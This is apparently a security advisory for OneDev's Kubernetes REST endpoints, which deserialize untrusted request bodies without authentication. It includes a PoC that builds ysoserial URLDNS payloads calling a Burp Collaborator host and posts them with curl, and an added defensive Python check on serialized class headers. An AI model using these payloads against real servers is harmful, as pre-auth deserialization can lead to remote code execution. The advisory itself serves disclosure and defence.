Impacts
A Kubernetes REST endpoint exposes two methods that deserialize untrusted data from the request body:
@Path("/allocate-job-caches")
@Consumes(MediaType.APPLICATION_OCTET_STREAM)
@Produces(MediaType.APPLICATION_OCTET_STREAM)
@POST
public byte[] allocateJobCaches(byte[] cacheAllocationRequestBytes) {
    CacheAllocationRequest allocationRequest = (CacheAllocationRequest) SerializationUtils.deserialize(cacheAllocationRequestBytes);
and
@Path("/report-job-caches")
@Consumes(MediaType.APPLICATION_OCTET_STREAM)
@POST
public void reportJobCaches(byte[] cacheInstanceBytes) {
    @SuppressWarnings("unchecked")
    Collection<CacheInstance> cacheInstances = (Collection<CacheInstance>) SerializationUtils
            .deserialize(cacheInstanceBytes);
    jobManager.reportJobCaches(getJobToken(), cacheInstances);
}
These endpoints do not enforce any authentication or authorization checks.
PoC
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches
This issue may lead to pre-auth RCE.
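Until the fix below is deployed, a defender can at least triage what reaches these two unauthenticated endpoints: every Java serialization stream starts with a fixed header followed by the top-level class descriptor, so a body whose top-level class is not the one the endpoint expects (the ysoserial URLDNS chain used in the PoC, for instance, serializes a java.util.HashMap) is immediately suspicious. The following is an added example written for this advisory, not OneDev code; the class name in ALLOWED is a placeholder, since the advisory does not give the fully qualified name of CacheAllocationRequest.

```python
import struct

# Java serialization stream constants (java.io.ObjectStreamConstants)
STREAM_MAGIC, STREAM_VERSION = 0xACED, 0x0005
TC_CLASSDESC, TC_OBJECT, TC_ARRAY = 0x72, 0x73, 0x75
TC_CLASS, TC_PROXYCLASSDESC, TC_ENUM = 0x76, 0x7D, 0x7E

# Placeholder for the class the endpoint legitimately expects; the real
# fully-qualified name is not given in the advisory.
ALLOWED = frozenset({"example.CacheAllocationRequest"})

def top_level_class(payload: bytes):
    """Return the class named by the stream's first class descriptor, or None
    when the first element is not an object/array/class/enum (e.g. a string).
    Raises ValueError when the bytes are not a Java serialization stream."""
    if len(payload) < 8:
        raise ValueError("too short for header plus class descriptor")
    magic, version, tc, desc_tc = struct.unpack(">HHBB", payload[:6])
    if (magic, version) != (STREAM_MAGIC, STREAM_VERSION):
        raise ValueError("missing STREAM_MAGIC/STREAM_VERSION")
    if tc not in (TC_OBJECT, TC_ARRAY, TC_CLASS, TC_ENUM):
        return None
    if desc_tc == TC_PROXYCLASSDESC:
        return "<dynamic proxy>"
    if desc_tc != TC_CLASSDESC:
        raise ValueError("expected TC_CLASSDESC after type code %#x" % tc)
    (name_len,) = struct.unpack(">H", payload[6:8])
    name = payload[8:8 + name_len]
    if len(name) != name_len:
        raise ValueError("truncated class name")
    return name.decode("utf-8")

def check_body(payload: bytes, allowed=ALLOWED):
    """Triage verdict for one request body: (accepted, reason)."""
    try:
        cls = top_level_class(payload)
    except ValueError as err:
        return False, f"not a Java serialization stream: {err}"
    if cls is None:
        return False, "top-level element is not an object"
    if cls not in allowed:
        return False, f"unexpected top-level class {cls}"
    return True, cls

def stream_prefix(class_name: str) -> bytes:
    """Constructed sample: header + TC_OBJECT + TC_CLASSDESC + class name only
    (not a complete or deserializable stream)."""
    name = class_name.encode("utf-8")
    return b"\xac\xed\x00\x05\x73\x72" + struct.pack(">H", len(name)) + name
```

This header check only classifies the outermost object; fields of an allowlisted class can still carry arbitrary nested objects, so it supports logging and alerting on the unauthenticated endpoints, not a substitute for the 4.0.3 fix that removes deserialization altogether.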
Patches
This issue was fixed in 4.0.3 by no longer using deserialization on the KubernetesResource side.
Credits
This issue was discovered by @pwntester